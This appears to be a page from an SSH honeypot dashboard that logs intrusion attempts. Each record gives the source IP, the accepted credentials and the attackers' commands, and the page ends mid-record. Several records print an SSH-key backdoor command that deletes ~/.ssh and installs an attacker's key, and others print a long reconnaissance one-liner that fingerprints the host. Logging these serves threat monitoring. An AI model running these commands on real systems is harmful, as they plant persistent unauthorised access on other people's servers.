nonproductions.net banner
Logo
Subsystem: NO BONK

Adversarial Observation Interface

Page 44 / 4369 (218430 total records)
Passive Observation Node - Active Operational Overview
170.0.61.70
2026-06-30 17:11:54.403556 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / Server_2023

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 3c6b18eb3fba
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 4.8s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "3c6b18eb3fba",
  "src_ip": "170.0.61.70",
  "start_time": "2026-06-30T17:11:54.403556Z",
  "end_time": "2026-06-30T17:11:59.238226Z",
  "duration": "4.8",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "Server_2023"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
2.57.122.150
2026-06-30 17:04:05.036926 UTC
COMMANDS RUN RECONNAISSANCE SUCCESSFUL LOGIN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 1234

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"
[obs-node]:~$ uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null
Command not found: /usr/bin/uname -s -v -n -m
[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ ( [ -f /proc/version ]
[obs-node]:~$ [ -f /proc/version ]
[obs-node]:~$ head -1 /proc/version | cut -d -f1
[obs-node]:~$ [ -f /etc/os-release ]
Record ID: 9c14b18ba076
Client Version: SSH-2.0-Go
Engagement Duration: 1.3s
HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5
{
  "id": "9c14b18ba076",
  "src_ip": "2.57.122.150",
  "start_time": "2026-06-30T17:04:05.036926Z",
  "end_time": "2026-06-30T17:04:06.295185Z",
  "duration": "1.3",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "1234"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "COMMANDS RUN",
    "RECONNAISSANCE",
    "SUCCESSFUL LOGIN"
  ]
}
43.153.204.181
2026-06-30 17:02:05.873745 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: 91c1c3923800
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 1.1s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "91c1c3923800",
  "src_ip": "43.153.204.181",
  "start_time": "2026-06-30T17:02:05.873745Z",
  "end_time": "2026-06-30T17:02:07.013396Z",
  "duration": "1.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
43.153.204.181
2026-06-30 17:02:03.566847 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: ea1eef953ab5
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2.1s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "ea1eef953ab5",
  "src_ip": "43.153.204.181",
  "start_time": "2026-06-30T17:02:03.566847Z",
  "end_time": "2026-06-30T17:02:05.695731Z",
  "duration": "2.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
43.153.204.181
2026-06-30 17:01:57.506858 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / woaini520...

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: dcb2baa5e3a7
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 9.5s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "dcb2baa5e3a7",
  "src_ip": "43.153.204.181",
  "start_time": "2026-06-30T17:01:57.506858Z",
  "end_time": "2026-06-30T17:02:07.009782Z",
  "duration": "9.5",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "woaini520..."
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
185.242.3.195
2026-06-30 16:59:13.131248 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / webadmin

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo OK
Record ID: 220fa025a355
Client Version: SSH-2.0-Go
Engagement Duration: 1.2s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "220fa025a355",
  "src_ip": "185.242.3.195",
  "start_time": "2026-06-30T16:59:13.131248Z",
  "end_time": "2026-06-30T16:59:14.295359Z",
  "duration": "1.2",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "webadmin"
  },
  "commands": [
    "echo OK"
  ],
  "detailed_commands": [
    {
      "cmd": "echo OK",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
218.13.157.209
2026-06-30 16:58:48.461531 UTC
SCORE: 10

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: f7e700282980
Client Version: Unknown
Engagement Duration: 2m 0s
{
  "id": "f7e700282980",
  "src_ip": "218.13.157.209",
  "start_time": "2026-06-30T16:58:48.461531Z",
  "end_time": "2026-06-30T17:00:48.500434Z",
  "duration": "120.0",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 10,
  "tags": []
}
2.57.122.150
2026-06-30 16:56:19.145650 UTC
COMMANDS RUN RECONNAISSANCE SUCCESSFUL LOGIN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 123321

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"
[obs-node]:~$ uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null
Command not found: /usr/bin/uname -s -v -n -m
[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ ( [ -f /proc/version ]
[obs-node]:~$ [ -f /proc/version ]
[obs-node]:~$ head -1 /proc/version | cut -d -f1
[obs-node]:~$ [ -f /etc/os-release ]
Record ID: 826b52c8e503
Client Version: SSH-2.0-Go
Engagement Duration: 1.3s
HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5
{
  "id": "826b52c8e503",
  "src_ip": "2.57.122.150",
  "start_time": "2026-06-30T16:56:19.145650Z",
  "end_time": "2026-06-30T16:56:20.406041Z",
  "duration": "1.3",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "123321"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
